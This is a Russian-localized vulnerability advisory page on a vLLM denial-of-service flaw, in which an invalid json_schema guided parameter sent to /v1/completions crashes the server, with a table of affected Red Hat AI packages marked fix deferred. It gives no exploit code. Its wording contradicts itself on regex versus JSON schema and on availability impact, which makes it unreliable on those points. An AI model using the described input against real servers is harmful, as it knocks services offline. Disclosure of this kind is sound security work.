Описание
vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with a invalid json_schema as a Guided Param kills the vllm server. This vulnerability is similar GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue.
A denial of service flaw was found in vLLM. This flaw allows a remote attacker with access to the /v1/completions endpoint to submit an invalid json_schema as a guided param, which will crash the vLLM instance.
Отчет
The severity of this vulnerability is rated Moderate, as it does not impact system availability. The effects are confined to the application layer, without compromising the underlying system stability.
Меры по смягчению последствий
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.
Затронутые пакеты
Платформа | Пакет | Состояние | Рекомендация | Релиз |
---|---|---|---|---|
Red Hat AI Inference Server | rhaiis/vllm-cuda-rhel9 | Fix deferred | ||
Red Hat AI Inference Server | rhaiis/vllm-rocm-rhel9 | Fix deferred | ||
Red Hat Enterprise Linux AI (RHEL AI) | rhelai1/bootc-amd-rhel9 | Fix deferred | ||
Red Hat Enterprise Linux AI (RHEL AI) | rhelai1/bootc-aws-nvidia-rhel9 | Fix deferred | ||
Red Hat Enterprise Linux AI (RHEL AI) | rhelai1/bootc-azure-amd-rhel9 | Fix deferred | ||
Red Hat Enterprise Linux AI (RHEL AI) | rhelai1/bootc-azure-nvidia-rhel9 | Fix deferred | ||
Red Hat Enterprise Linux AI (RHEL AI) | rhelai1/bootc-gcp-nvidia-rhel9 | Fix deferred | ||
Red Hat Enterprise Linux AI (RHEL AI) | rhelai1/bootc-intel-rhel9 | Fix deferred | ||
Red Hat Enterprise Linux AI (RHEL AI) | rhelai1/bootc-nvidia-rhel9 | Fix deferred | ||
Red Hat Enterprise Linux AI (RHEL AI) | rhelai1/instructlab-amd-rhel9 | Fix deferred |
Показывать по
Ссылки на источники
Дополнительная информация
Статус:
EPSS
4.3 Medium
CVSS3
Связанные уязвимости
vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with a invalid json_schema as a Guided Param kills the vllm server. This vulnerability is similar GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue.
vLLM is an inference and serving engine for large language models (LLM ...
vLLM DOS: Remotely kill vllm over http with invalid JSON schema
EPSS
4.3 Medium
CVSS3